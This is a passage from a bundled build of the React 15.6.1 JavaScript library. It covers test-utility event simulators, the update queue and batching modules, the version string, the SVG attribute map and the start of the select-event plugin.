EventPluginHub.injection.injectEventPluginOrder;\nEventPluginHub.injection.injectEventPluginOrder = function () {\n  oldInjectEventPluginOrder.apply(this, arguments);\n  buildSimulators();\n};\nvar oldInjectEventPlugins = EventPluginHub.injection.injectEventPluginsByName;\nEventPluginHub.injection.injectEventPluginsByName = function () {\n  oldInjectEventPlugins.apply(this, arguments);\n  buildSimulators();\n};\n\nbuildSimulators();\n\n/**\n * Exports:\n *\n * - `ReactTestUtils.SimulateNative.click(Element/ReactDOMComponent)`\n * - `ReactTestUtils.SimulateNative.mouseMove(Element/ReactDOMComponent)`\n * - `ReactTestUtils.SimulateNative.mouseIn/ReactDOMComponent)`\n * - `ReactTestUtils.SimulateNative.mouseOut(Element/ReactDOMComponent)`\n * - ... (All keys from `EventConstants.topLevelTypes`)\n *\n * Note: Top level event types are a subset of the entire set of handler types\n * (which include a broader set of \"synthetic\" events). For example, onDragDone\n * is a synthetic event. Except when testing an event plugin or React's event\n * handling code specifically, you probably want to use ReactTestUtils.Simulate\n * to dispatch synthetic events.\n */\n\nfunction makeNativeSimulator(eventType) {\n  return function (domComponentOrNode, nativeEventData) {\n    var fakeNativeEvent = new Event(eventType);\n    _assign(fakeNativeEvent, nativeEventData);\n    if (ReactTestUtils.isDOMComponent(domComponentOrNode)) {\n      ReactTestUtils.simulateNativeEventOnDOMComponent(eventType, domComponentOrNode, fakeNativeEvent);\n    } else if (domComponentOrNode.tagName) {\n      // Will allow on actual dom nodes.\n      ReactTestUtils.simulateNativeEventOnNode(eventType, domComponentOrNode, fakeNativeEvent);\n    }\n  };\n}\n\nObject.keys(topLevelTypes).forEach(function (eventType) {\n  // Event type is stored as 'topClick' - we transform that to 'click'\n  var convenienceName = eventType.indexOf('top') === 0 ? eventType.charAt(3).toLowerCase() + eventType.substr(4) : eventType;\n  /**\n   * @param {!Element|ReactDOMComponent} domComponentOrNode\n   * @param {?Event} nativeEventData Fake native event to use in SyntheticEvent.\n   */\n  ReactTestUtils.SimulateNative[convenienceName] = makeNativeSimulator(eventType);\n});\n\nmodule.exports = ReactTestUtils;\n},{\"108\":108,\"126\":126,\"135\":135,\"152\":152,\"159\":159,\"16\":16,\"160\":160,\"17\":17,\"18\":18,\"20\":20,\"26\":26,\"31\":31,\"34\":34,\"63\":63,\"79\":79,\"82\":82,\"91\":91}],81:[function(_dereq_,module,exports){\n/**\n * Copyright 2015-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar ReactCurrentOwner = _dereq_(134);\nvar ReactInstanceMap = _dereq_(63);\nvar ReactInstrumentation = _dereq_(64);\nvar ReactUpdates = _dereq_(82);\n\nvar invariant = _dereq_(152);\nvar warning = _dereq_(159);\n\nfunction enqueueUpdate(internalInstance) {\n  ReactUpdates.enqueueUpdate(internalInstance);\n}\n\nfunction formatUnexpectedArgument(arg) {\n  var type = typeof arg;\n  if (type !== 'object') {\n    return type;\n  }\n  var displayName = arg.constructor && arg.constructor.name || type;\n  var keys = Object.keys(arg);\n  if (keys.length > 0 && keys.length < 20) {\n    return displayName + ' (keys: ' + keys.join(', ') + ')';\n  }\n  return displayName;\n}\n\nfunction getInternalInstanceReadyForUpdate(publicInstance, callerName) {\n  var internalInstance = ReactInstanceMap.get(publicInstance);\n  if (!internalInstance) {\n    if (\"development\" !== 'production') {\n      var ctor = publicInstance.constructor;\n      // Only warn when we have a callerName. Otherwise we should be silent.\n      // We're probably calling from enqueueCallback. We don't want to warn\n      // there because we already warned for the corresponding lifecycle method.\n      \"development\" !== 'production' ? warning(!callerName, '%s(...): Can only update a mounted or mounting component. ' + 'This usually means you called %s() on an unmounted component. ' + 'This is a no-op. Please check the code for the %s component.', callerName, callerName, ctor && (ctor.displayName || ctor.name) || 'ReactClass') : void 0;\n    }\n    return null;\n  }\n\n  if (\"development\" !== 'production') {\n    \"development\" !== 'production' ? warning(ReactCurrentOwner.current == null, '%s(...): Cannot update during an existing state transition (such as ' + \"within `render` or another component's constructor). Render methods \" + 'should be a pure function of props and state; constructor ' + 'side-effects are an anti-pattern, but can be moved to ' + '`componentWillMount`.', callerName) : void 0;\n  }\n\n  return internalInstance;\n}\n\n/**\n * ReactUpdateQueue allows for state updates to be scheduled into a later\n * reconciliation step.\n */\nvar ReactUpdateQueue = {\n  /**\n   * Checks whether or not this composite component is mounted.\n   * @param {ReactClass} publicInstance The instance we want to test.\n   * @return {boolean} True if mounted, false otherwise.\n   * @protected\n   * @final\n   */\n  isMounted: function (publicInstance) {\n    if (\"development\" !== 'production') {\n      var owner = ReactCurrentOwner.current;\n      if (owner !== null) {\n        \"development\" !== 'production' ? warning(owner._warnedAboutRefsInRender, '%s is accessing isMounted inside its render() function. ' + 'render() should be a pure function of props and state. It should ' + 'never access something that requires stale data from the previous ' + 'render, such as refs. Move this logic to componentDidMount and ' + 'componentDidUpdate instead.', owner.getName() || 'A component') : void 0;\n        owner._warnedAboutRefsInRender = true;\n      }\n    }\n    var internalInstance = ReactInstanceMap.get(publicInstance);\n    if (internalInstance) {\n      // During componentWillMount and render this will still be null but after\n      // that will always render to something. At least for now. So we can use\n      // this hack.\n      return !!internalInstance._renderedComponent;\n    } else {\n      return false;\n    }\n  },\n\n  /**\n   * Enqueue a callback that will be executed after all the pending updates\n   * have processed.\n   *\n   * @param {ReactClass} publicInstance The instance to use as `this` context.\n   * @param {?function} callback Called after state is updated.\n   * @param {string} callerName Name of the calling function in the public API.\n   * @internal\n   */\n  enqueueCallback: function (publicInstance, callback, callerName) {\n    ReactUpdateQueue.validateCallback(callback, callerName);\n    var internalInstance = getInternalInstanceReadyForUpdate(publicInstance);\n\n    // Previously we would throw an error if we didn't have an internal\n    // instance. Since we want to make it a no-op instead, we mirror the same\n    // behavior we have in other enqueue* methods.\n    // We also need to ignore callbacks in componentWillMount. See\n    // enqueueUpdates.\n    if (!internalInstance) {\n      return null;\n    }\n\n    if (internalInstance._pendingCallbacks) {\n      internalInstance._pendingCallbacks.push(callback);\n    } else {\n      internalInstance._pendingCallbacks = [callback];\n    }\n    // TODO: The callback here is ignored when setState is called from\n    // componentWillMount. Either fix it or disallow doing so completely in\n    // favor of getInitialState. Alternatively, we can disallow\n    // componentWillMount during server-side rendering.\n    enqueueUpdate(internalInstance);\n  },\n\n  enqueueCallbackInternal: function (internalInstance, callback) {\n    if (internalInstance._pendingCallbacks) {\n      internalInstance._pendingCallbacks.push(callback);\n    } else {\n      internalInstance._pendingCallbacks = [callback];\n    }\n    enqueueUpdate(internalInstance);\n  },\n\n  /**\n   * Forces an update. This should only be invoked when it is known with\n   * certainty that we are **not** in a DOM transaction.\n   *\n   * You may want to call this when you know that some deeper aspect of the\n   * component's state has changed but `setState` was not called.\n   *\n   * This will not invoke `shouldComponentUpdate`, but it will invoke\n   * `componentWillUpdate` and `componentDidUpdate`.\n   *\n   * @param {ReactClass} publicInstance The instance that should rerender.\n   * @internal\n   */\n  enqueueForceUpdate: function (publicInstance) {\n    var internalInstance = getInternalInstanceReadyForUpdate(publicInstance, 'forceUpdate');\n\n    if (!internalInstance) {\n      return;\n    }\n\n    internalInstance._pendingForceUpdate = true;\n\n    enqueueUpdate(internalInstance);\n  },\n\n  /**\n   * Replaces all of the state. Always use this or `setState` to mutate state.\n   * You should treat `this.state` as immutable.\n   *\n   * There is no guarantee that `this.state` will be immediately updated, so\n   * accessing `this.state` after calling this method may return the old value.\n   *\n   * @param {ReactClass} publicInstance The instance that should rerender.\n   * @param {object} completeState Next state.\n   * @internal\n   */\n  enqueueReplaceState: function (publicInstance, completeState, callback) {\n    var internalInstance = getInternalInstanceReadyForUpdate(publicInstance, 'replaceState');\n\n    if (!internalInstance) {\n      return;\n    }\n\n    internalInstance._pendingStateQueue = [completeState];\n    internalInstance._pendingReplaceState = true;\n\n    // Future-proof 15.5\n    if (callback !== undefined && callback !== null) {\n      ReactUpdateQueue.validateCallback(callback, 'replaceState');\n      if (internalInstance._pendingCallbacks) {\n        internalInstance._pendingCallbacks.push(callback);\n      } else {\n        internalInstance._pendingCallbacks = [callback];\n      }\n    }\n\n    enqueueUpdate(internalInstance);\n  },\n\n  /**\n   * Sets a subset of the state. This only exists because _pendingState is\n   * internal. This provides a merging strategy that is not available to deep\n   * properties which is confusing. TODO: Expose pendingState or don't use it\n   * during the merge.\n   *\n   * @param {ReactClass} publicInstance The instance that should rerender.\n   * @param {object} partialState Next partial state to be merged with state.\n   * @internal\n   */\n  enqueueSetState: function (publicInstance, partialState) {\n    if (\"development\" !== 'production') {\n      ReactInstrumentation.debugTool.onSetState();\n      \"development\" !== 'production' ? warning(partialState != null, 'setState(...): You passed an undefined or null state object; ' + 'instead, use forceUpdate().') : void 0;\n    }\n\n    var internalInstance = getInternalInstanceReadyForUpdate(publicInstance, 'setState');\n\n    if (!internalInstance) {\n      return;\n    }\n\n    var queue = internalInstance._pendingStateQueue || (internalInstance._pendingStateQueue = []);\n    queue.push(partialState);\n\n    enqueueUpdate(internalInstance);\n  },\n\n  enqueueElementInternal: function (internalInstance, nextElement, nextContext) {\n    internalInstance._pendingElement = nextElement;\n    // TODO: introduce _pendingContext instead of setting it directly.\n    internalInstance._context = nextContext;\n    enqueueUpdate(internalInstance);\n  },\n\n  validateCallback: function (callback, callerName) {\n    !(!callback || typeof callback === 'function') ? \"development\" !== 'production' ? invariant(false, '%s(...): Expected the last optional `callback` argument to be a function. Instead received: %s.', callerName, formatUnexpectedArgument(callback)) : _prodInvariant('122', callerName, formatUnexpectedArgument(callback)) : void 0;\n  }\n};\n\nmodule.exports = ReactUpdateQueue;\n},{\"126\":126,\"134\":134,\"152\":152,\"159\":159,\"63\":63,\"64\":64,\"82\":82}],82:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126),\n    _assign = _dereq_(160);\n\nvar CallbackQueue = _dereq_(6);\nvar PooledClass = _dereq_(25);\nvar ReactFeatureFlags = _dereq_(58);\nvar ReactReconciler = _dereq_(75);\nvar Transaction = _dereq_(100);\n\nvar invariant = _dereq_(152);\n\nvar dirtyComponents = [];\nvar updateBatchNumber = 0;\nvar asapCallbackQueue = CallbackQueue.getPooled();\nvar asapEnqueued = false;\n\nvar batchingStrategy = null;\n\nfunction ensureInjected() {\n  !(ReactUpdates.ReactReconcileTransaction && batchingStrategy) ? \"development\" !== 'production' ? invariant(false, 'ReactUpdates: must inject a reconcile transaction class and batching strategy') : _prodInvariant('123') : void 0;\n}\n\nvar NESTED_UPDATES = {\n  initialize: function () {\n    this.dirtyComponentsLength = dirtyComponents.length;\n  },\n  close: function () {\n    if (this.dirtyComponentsLength !== dirtyComponents.length) {\n      // Additional updates were enqueued by componentDidUpdate handlers or\n      // similar; before our own UPDATE_QUEUEING wrapper closes, we want to run\n      // these new updates so that if A's componentDidUpdate calls setState on\n      // B, B will update before the callback A's updater provided when calling\n      // setState.\n      dirtyComponents.splice(0, this.dirtyComponentsLength);\n      flushBatchedUpdates();\n    } else {\n      dirtyComponents.length = 0;\n    }\n  }\n};\n\nvar UPDATE_QUEUEING = {\n  initialize: function () {\n    this.callbackQueue.reset();\n  },\n  close: function () {\n    this.callbackQueue.notifyAll();\n  }\n};\n\nvar TRANSACTION_WRAPPERS = [NESTED_UPDATES, UPDATE_QUEUEING];\n\nfunction ReactUpdatesFlushTransaction() {\n  this.reinitializeTransaction();\n  this.dirtyComponentsLength = null;\n  this.callbackQueue = CallbackQueue.getPooled();\n  this.reconcileTransaction = ReactUpdates.ReactReconcileTransaction.getPooled(\n  /* useCreateElement */true);\n}\n\n_assign(ReactUpdatesFlushTransaction.prototype, Transaction, {\n  getTransactionWrappers: function () {\n    return TRANSACTION_WRAPPERS;\n  },\n\n  destructor: function () {\n    this.dirtyComponentsLength = null;\n    CallbackQueue.release(this.callbackQueue);\n    this.callbackQueue = null;\n    ReactUpdates.ReactReconcileTransaction.release(this.reconcileTransaction);\n    this.reconcileTransaction = null;\n  },\n\n  perform: function (method, scope, a) {\n    // Essentially calls `this.reconcileTransaction.perform(method, scope, a)`\n    // with this transaction's wrappers around it.\n    return Transaction.perform.call(this, this.reconcileTransaction.perform, this.reconcileTransaction, method, scope, a);\n  }\n});\n\nPooledClass.addPoolingTo(ReactUpdatesFlushTransaction);\n\nfunction batchedUpdates(callback, a, b, c, d, e) {\n  ensureInjected();\n  return batchingStrategy.batchedUpdates(callback, a, b, c, d, e);\n}\n\n/**\n * Array comparator for ReactComponents by mount ordering.\n *\n * @param {ReactComponent} c1 first component you're comparing\n * @param {ReactComponent} c2 second component you're comparing\n * @return {number} Return value usable by Array.prototype.sort().\n */\nfunction mountOrderComparator(c1, c2) {\n  return c1._mountOrder - c2._mountOrder;\n}\n\nfunction runBatchedUpdates(transaction) {\n  var len = transaction.dirtyComponentsLength;\n  !(len === dirtyComponents.length) ? \"development\" !== 'production' ? invariant(false, 'Expected flush transaction\\'s stored dirty-components length (%s) to match dirty-components array length (%s).', len, dirtyComponents.length) : _prodInvariant('124', len, dirtyComponents.length) : void 0;\n\n  // Since reconciling a component higher in the owner hierarchy usually (not\n  // always -- see shouldComponentUpdate()) will reconcile children, reconcile\n  // them before their children by sorting the array.\n  dirtyComponents.sort(mountOrderComparator);\n\n  // Any updates enqueued while reconciling must be performed after this entire\n  // batch. Otherwise, if dirtyComponents is [A, B] where A has children B and\n  // C, B could update twice in a single batch if C's render enqueues an update\n  // to B (since B would have already updated, we should skip it, and the only\n  // way we can know to do so is by checking the batch counter).\n  updateBatchNumber++;\n\n  for (var i = 0; i < len; i++) {\n    // If a component is unmounted before pending changes apply, it will still\n    // be here, but we assume that it has cleared its _pendingCallbacks and\n    // that performUpdateIfNecessary is a noop.\n    var component = dirtyComponents[i];\n\n    // If performUpdateIfNecessary happens to enqueue any new updates, we\n    // shouldn't execute the callbacks until the next render happens, so\n    // stash the callbacks first\n    var callbacks = component._pendingCallbacks;\n    component._pendingCallbacks = null;\n\n    var markerName;\n    if (ReactFeatureFlags.logTopLevelRenders) {\n      var namedComponent = component;\n      // Duck type TopLevelWrapper. This is probably always true.\n      if (component._currentElement.type.isReactTopLevelWrapper) {\n        namedComponent = component._renderedComponent;\n      }\n      markerName = 'React update: ' + namedComponent.getName();\n      console.time(markerName);\n    }\n\n    ReactReconciler.performUpdateIfNecessary(component, transaction.reconcileTransaction, updateBatchNumber);\n\n    if (markerName) {\n      console.timeEnd(markerName);\n    }\n\n    if (callbacks) {\n      for (var j = 0; j < callbacks.length; j++) {\n        transaction.callbackQueue.enqueue(callbacks[j], component.getPublicInstance());\n      }\n    }\n  }\n}\n\nvar flushBatchedUpdates = function () {\n  // ReactUpdatesFlushTransaction's wrappers will clear the dirtyComponents\n  // array and perform any updates enqueued by mount-ready handlers (i.e.,\n  // componentDidUpdate) but we need to check here too in order to catch\n  // updates enqueued by setState callbacks and asap calls.\n  while (dirtyComponents.length || asapEnqueued) {\n    if (dirtyComponents.length) {\n      var transaction = ReactUpdatesFlushTransaction.getPooled();\n      transaction.perform(runBatchedUpdates, null, transaction);\n      ReactUpdatesFlushTransaction.release(transaction);\n    }\n\n    if (asapEnqueued) {\n      asapEnqueued = false;\n      var queue = asapCallbackQueue;\n      asapCallbackQueue = CallbackQueue.getPooled();\n      queue.notifyAll();\n      CallbackQueue.release(queue);\n    }\n  }\n};\n\n/**\n * Mark a component as needing a rerender, adding an optional callback to a\n * list of functions which will be executed once the rerender occurs.\n */\nfunction enqueueUpdate(component) {\n  ensureInjected();\n\n  // Various parts of our code (such as ReactCompositeComponent's\n  // _renderValidatedComponent) assume that calls to render aren't nested;\n  // verify that that's the case. (This is called by each top-level update\n  // function, like setState, forceUpdate, etc.; creation and\n  // destruction of top-level components is guarded in ReactMount.)\n\n  if (!batchingStrategy.isBatchingUpdates) {\n    batchingStrategy.batchedUpdates(enqueueUpdate, component);\n    return;\n  }\n\n  dirtyComponents.push(component);\n  if (component._updateBatchNumber == null) {\n    component._updateBatchNumber = updateBatchNumber + 1;\n  }\n}\n\n/**\n * Enqueue a callback to be run at the end of the current batching cycle. Throws\n * if no updates are currently being performed.\n */\nfunction asap(callback, context) {\n  !batchingStrategy.isBatchingUpdates ? \"development\" !== 'production' ? invariant(false, 'ReactUpdates.asap: Can\\'t enqueue an asap callback in a context whereupdates are not being batched.') : _prodInvariant('125') : void 0;\n  asapCallbackQueue.enqueue(callback, context);\n  asapEnqueued = true;\n}\n\nvar ReactUpdatesInjection = {\n  injectReconcileTransaction: function (ReconcileTransaction) {\n    !ReconcileTransaction ? \"development\" !== 'production' ? invariant(false, 'ReactUpdates: must provide a reconcile transaction class') : _prodInvariant('126') : void 0;\n    ReactUpdates.ReactReconcileTransaction = ReconcileTransaction;\n  },\n\n  injectBatchingStrategy: function (_batchingStrategy) {\n    !_batchingStrategy ? \"development\" !== 'production' ? invariant(false, 'ReactUpdates: must provide a batching strategy') : _prodInvariant('127') : void 0;\n    !(typeof _batchingStrategy.batchedUpdates === 'function') ? \"development\" !== 'production' ? invariant(false, 'ReactUpdates: must provide a batchedUpdates() function') : _prodInvariant('128') : void 0;\n    !(typeof _batchingStrategy.isBatchingUpdates === 'boolean') ? \"development\" !== 'production' ? invariant(false, 'ReactUpdates: must provide an isBatchingUpdates boolean attribute') : _prodInvariant('129') : void 0;\n    batchingStrategy = _batchingStrategy;\n  }\n};\n\nvar ReactUpdates = {\n  /**\n   * React references `ReactReconcileTransaction` using this property in order\n   * to allow dependency injection.\n   *\n   * @internal\n   */\n  ReactReconcileTransaction: null,\n\n  batchedUpdates: batchedUpdates,\n  enqueueUpdate: enqueueUpdate,\n  flushBatchedUpdates: flushBatchedUpdates,\n  injection: ReactUpdatesInjection,\n  asap: asap\n};\n\nmodule.exports = ReactUpdates;\n},{\"100\":100,\"126\":126,\"152\":152,\"160\":160,\"25\":25,\"58\":58,\"6\":6,\"75\":75}],83:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nmodule.exports = '15.6.1';\n},{}],84:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar NS = {\n  xlink: 'http://www.w3.org/1999/xlink',\n  xml: 'http://www.w3.org/XML/1998/namespace'\n};\n\n// We use attributes for everything SVG so let's avoid some duplication and run\n// code instead.\n// The following are all specified in the HTML config already so we exclude here.\n// - class (as className)\n// - color\n// - height\n// - id\n// - lang\n// - max\n// - media\n// - method\n// - min\n// - name\n// - style\n// - target\n// - type\n// - width\nvar ATTRS = {\n  accentHeight: 'accent-height',\n  accumulate: 0,\n  additive: 0,\n  alignmentBaseline: 'alignment-baseline',\n  allowReorder: 'allowReorder',\n  alphabetic: 0,\n  amplitude: 0,\n  arabicForm: 'arabic-form',\n  ascent: 0,\n  attributeName: 'attributeName',\n  attributeType: 'attributeType',\n  autoReverse: 'autoReverse',\n  azimuth: 0,\n  baseFrequency: 'baseFrequency',\n  baseProfile: 'baseProfile',\n  baselineShift: 'baseline-shift',\n  bbox: 0,\n  begin: 0,\n  bias: 0,\n  by: 0,\n  calcMode: 'calcMode',\n  capHeight: 'cap-height',\n  clip: 0,\n  clipPath: 'clip-path',\n  clipRule: 'clip-rule',\n  clipPathUnits: 'clipPathUnits',\n  colorInterpolation: 'color-interpolation',\n  colorInterpolationFilters: 'color-interpolation-filters',\n  colorProfile: 'color-profile',\n  colorRendering: 'color-rendering',\n  contentScriptType: 'contentScriptType',\n  contentStyleType: 'contentStyleType',\n  cursor: 0,\n  cx: 0,\n  cy: 0,\n  d: 0,\n  decelerate: 0,\n  descent: 0,\n  diffuseConstant: 'diffuseConstant',\n  direction: 0,\n  display: 0,\n  divisor: 0,\n  dominantBaseline: 'dominant-baseline',\n  dur: 0,\n  dx: 0,\n  dy: 0,\n  edgeMode: 'edgeMode',\n  elevation: 0,\n  enableBackground: 'enable-background',\n  end: 0,\n  exponent: 0,\n  externalResourcesRequired: 'externalResourcesRequired',\n  fill: 0,\n  fillOpacity: 'fill-opacity',\n  fillRule: 'fill-rule',\n  filter: 0,\n  filterRes: 'filterRes',\n  filterUnits: 'filterUnits',\n  floodColor: 'flood-color',\n  floodOpacity: 'flood-opacity',\n  focusable: 0,\n  fontFamily: 'font-family',\n  fontSize: 'font-size',\n  fontSizeAdjust: 'font-size-adjust',\n  fontStretch: 'font-stretch',\n  fontStyle: 'font-style',\n  fontVariant: 'font-variant',\n  fontWeight: 'font-weight',\n  format: 0,\n  from: 0,\n  fx: 0,\n  fy: 0,\n  g1: 0,\n  g2: 0,\n  glyphName: 'glyph-name',\n  glyphOrientationHorizontal: 'glyph-orientation-horizontal',\n  glyphOrientationVertical: 'glyph-orientation-vertical',\n  glyphRef: 'glyphRef',\n  gradientTransform: 'gradientTransform',\n  gradientUnits: 'gradientUnits',\n  hanging: 0,\n  horizAdvX: 'horiz-adv-x',\n  horizOriginX: 'horiz-origin-x',\n  ideographic: 0,\n  imageRendering: 'image-rendering',\n  'in': 0,\n  in2: 0,\n  intercept: 0,\n  k: 0,\n  k1: 0,\n  k2: 0,\n  k3: 0,\n  k4: 0,\n  kernelMatrix: 'kernelMatrix',\n  kernelUnitLength: 'kernelUnitLength',\n  kerning: 0,\n  keyPoints: 'keyPoints',\n  keySplines: 'keySplines',\n  keyTimes: 'keyTimes',\n  lengthAdjust: 'lengthAdjust',\n  letterSpacing: 'letter-spacing',\n  lightingColor: 'lighting-color',\n  limitingConeAngle: 'limitingConeAngle',\n  local: 0,\n  markerEnd: 'marker-end',\n  markerMid: 'marker-mid',\n  markerStart: 'marker-start',\n  markerHeight: 'markerHeight',\n  markerUnits: 'markerUnits',\n  markerWidth: 'markerWidth',\n  mask: 0,\n  maskContentUnits: 'maskContentUnits',\n  maskUnits: 'maskUnits',\n  mathematical: 0,\n  mode: 0,\n  numOctaves: 'numOctaves',\n  offset: 0,\n  opacity: 0,\n  operator: 0,\n  order: 0,\n  orient: 0,\n  orientation: 0,\n  origin: 0,\n  overflow: 0,\n  overlinePosition: 'overline-position',\n  overlineThickness: 'overline-thickness',\n  paintOrder: 'paint-order',\n  panose1: 'panose-1',\n  pathLength: 'pathLength',\n  patternContentUnits: 'patternContentUnits',\n  patternTransform: 'patternTransform',\n  patternUnits: 'patternUnits',\n  pointerEvents: 'pointer-events',\n  points: 0,\n  pointsAtX: 'pointsAtX',\n  pointsAtY: 'pointsAtY',\n  pointsAtZ: 'pointsAtZ',\n  preserveAlpha: 'preserveAlpha',\n  preserveAspectRatio: 'preserveAspectRatio',\n  primitiveUnits: 'primitiveUnits',\n  r: 0,\n  radius: 0,\n  refX: 'refX',\n  refY: 'refY',\n  renderingIntent: 'rendering-intent',\n  repeatCount: 'repeatCount',\n  repeatDur: 'repeatDur',\n  requiredExtensions: 'requiredExtensions',\n  requiredFeatures: 'requiredFeatures',\n  restart: 0,\n  result: 0,\n  rotate: 0,\n  rx: 0,\n  ry: 0,\n  scale: 0,\n  seed: 0,\n  shapeRendering: 'shape-rendering',\n  slope: 0,\n  spacing: 0,\n  specularConstant: 'specularConstant',\n  specularExponent: 'specularExponent',\n  speed: 0,\n  spreadMethod: 'spreadMethod',\n  startOffset: 'startOffset',\n  stdDeviation: 'stdDeviation',\n  stemh: 0,\n  stemv: 0,\n  stitchTiles: 'stitchTiles',\n  stopColor: 'stop-color',\n  stopOpacity: 'stop-opacity',\n  strikethroughPosition: 'strikethrough-position',\n  strikethroughThickness: 'strikethrough-thickness',\n  string: 0,\n  stroke: 0,\n  strokeDasharray: 'stroke-dasharray',\n  strokeDashoffset: 'stroke-dashoffset',\n  strokeLinecap: 'stroke-linecap',\n  strokeLinejoin: 'stroke-linejoin',\n  strokeMiterlimit: 'stroke-miterlimit',\n  strokeOpacity: 'stroke-opacity',\n  strokeWidth: 'stroke-width',\n  surfaceScale: 'surfaceScale',\n  systemLanguage: 'systemLanguage',\n  tableValues: 'tableValues',\n  targetX: 'targetX',\n  targetY: 'targetY',\n  textAnchor: 'text-anchor',\n  textDecoration: 'text-decoration',\n  textRendering: 'text-rendering',\n  textLength: 'textLength',\n  to: 0,\n  transform: 0,\n  u1: 0,\n  u2: 0,\n  underlinePosition: 'underline-position',\n  underlineThickness: 'underline-thickness',\n  unicode: 0,\n  unicodeBidi: 'unicode-bidi',\n  unicodeRange: 'unicode-range',\n  unitsPerEm: 'units-per-em',\n  vAlphabetic: 'v-alphabetic',\n  vHanging: 'v-hanging',\n  vIdeographic: 'v-ideographic',\n  vMathematical: 'v-mathematical',\n  values: 0,\n  vectorEffect: 'vector-effect',\n  version: 0,\n  vertAdvY: 'vert-adv-y',\n  vertOriginX: 'vert-origin-x',\n  vertOriginY: 'vert-origin-y',\n  viewBox: 'viewBox',\n  viewTarget: 'viewTarget',\n  visibility: 0,\n  widths: 0,\n  wordSpacing: 'word-spacing',\n  writingMode: 'writing-mode',\n  x: 0,\n  xHeight: 'x-height',\n  x1: 0,\n  x2: 0,\n  xChannelSelector: 'xChannelSelector',\n  xlinkActuate: 'xlink:actuate',\n  xlinkArcrole: 'xlink:arcrole',\n  xlinkHref: 'xlink:href',\n  xlinkRole: 'xlink:role',\n  xlinkShow: 'xlink:show',\n  xlinkTitle: 'xlink:title',\n  xlinkType: 'xlink:type',\n  xmlBase: 'xml:base',\n  xmlns: 0,\n  xmlnsXlink: 'xmlns:xlink',\n  xmlLang: 'xml:lang',\n  xmlSpace: 'xml:space',\n  y: 0,\n  y1: 0,\n  y2: 0,\n  yChannelSelector: 'yChannelSelector',\n  z: 0,\n  zoomAndPan: 'zoomAndPan'\n};\n\nvar SVGDOMPropertyConfig = {\n  Properties: {},\n  DOMAttributeNamespaces: {\n    xlinkActuate: NS.xlink,\n    xlinkArcrole: NS.xlink,\n    xlinkHref: NS.xlink,\n    xlinkRole: NS.xlink,\n    xlinkShow: NS.xlink,\n    xlinkTitle: NS.xlink,\n    xlinkType: NS.xlink,\n    xmlBase: NS.xml,\n    xmlLang: NS.xml,\n    xmlSpace: NS.xml\n  },\n  DOMAttributeNames: {}\n};\n\nObject.keys(ATTRS).forEach(function (key) {\n  SVGDOMPropertyConfig.Properties[key] = 0;\n  if (ATTRS[key]) {\n    SVGDOMPropertyConfig.DOMAttributeNames[key] = ATTRS[key];\n  }\n});\n\nmodule.exports = SVGDOMPropertyConfig;\n},{}],85:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar EventPropagators = _dereq_(20);\nvar ExecutionEnvironment = _dereq_(138);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactInputSelection = _dereq_(62);\nvar SyntheticEvent = _dereq_(91);\n\nvar getActiveElement = _dereq_(147);\nvar isTextInputElement = _dereq_(123);\nvar shallowEqual = _dereq_(158);\n\nvar skipSelectionChangeEvent = ExecutionEnvironment.canUseDOM && 'documentMode' in document && document.documentMode <= 11;\n\nvar eventTypes = {\n  select: {\n    phasedRegistrationNames: {\n      bubbled: 'onSelect',\n      captured: 'onSelectCapture'\n    },\n    dependencies: ['topBlur', 'topContextMenu', 'topFocus', 'topKeyDown', 'topKeyUp', 'topMouseDown', 'topMouseUp', 'topSelectionChange']\n  }\n};\n\nvar activeElement = null;\nvar activeElementInst = null;\nvar lastSelection = null;\nvar mouseDown = false;\n\n// Track whether a listener exists for this plugin. If none exist, we do\n// not extract events. See #3639.\nvar hasListener = false;\n\n/**\n * Get an object which is a unique representation of the current selection.\n *\n * The return value will not be consistent across nodes or browsers, but\n * two identical selections on the same node will return identical objects.\n *\n * @param {DOMElement} node\n * @return {object}\n */\nfunction getSelection(node) {\n  if ('selectionStart' in node && ReactInputSelection.hasSelectionCapabilities(node)) {\n    return {\n      start: node.selectionStart,\n      end: node.selectionEnd\n    };\n  } else if (window.getSelection) {\n    var selection = window.getSelection();\n    return {\n      anchorNode: selection.anchorNode,\n      anchorOffset: selection.anchorOffset,\n      focusNode: selection.focusNode,\n      focusOffset: selection.focusOffset\n    };\n  } else if (document.selection) {\n    var range = document.selection.createRange();\n    return {\n      parentElement: range.parentElement(),\n      text: range.text,\n      top: range.boundingTop,\n      left: range.boundingLeft\n    };\n  }\n}\n\n/**\n * Poll selection to see whether it's changed.\n *\n * @param {object} nativeEvent\n * @return {?SyntheticEvent}\n */\nfunction constructSelectEvent(nativeEvent, nativeEventTarget) {\n  // Ensure we have the right element, and that the user is not dragging a\n  // selection (this matches native `select` event behavior). In HTML5, select\n  // fires only on input and textarea thus if there's no focused element we\n  // won't dispatch.\n  if (mouseDown || activeElement == null || activeElement !== getActiveElement()) {\n    return null;\n  }\n\n  // Only fire when selection has actually changed.\n  var currentSelection = getSelection(activeElement);\n  if (!lastSelection || !shallowEqual(lastSelection, currentSelection)) {\n    lastSelection = currentSelection;\n\n    var syntheticEvent = SyntheticEvent.getPooled(eventTypes.select, 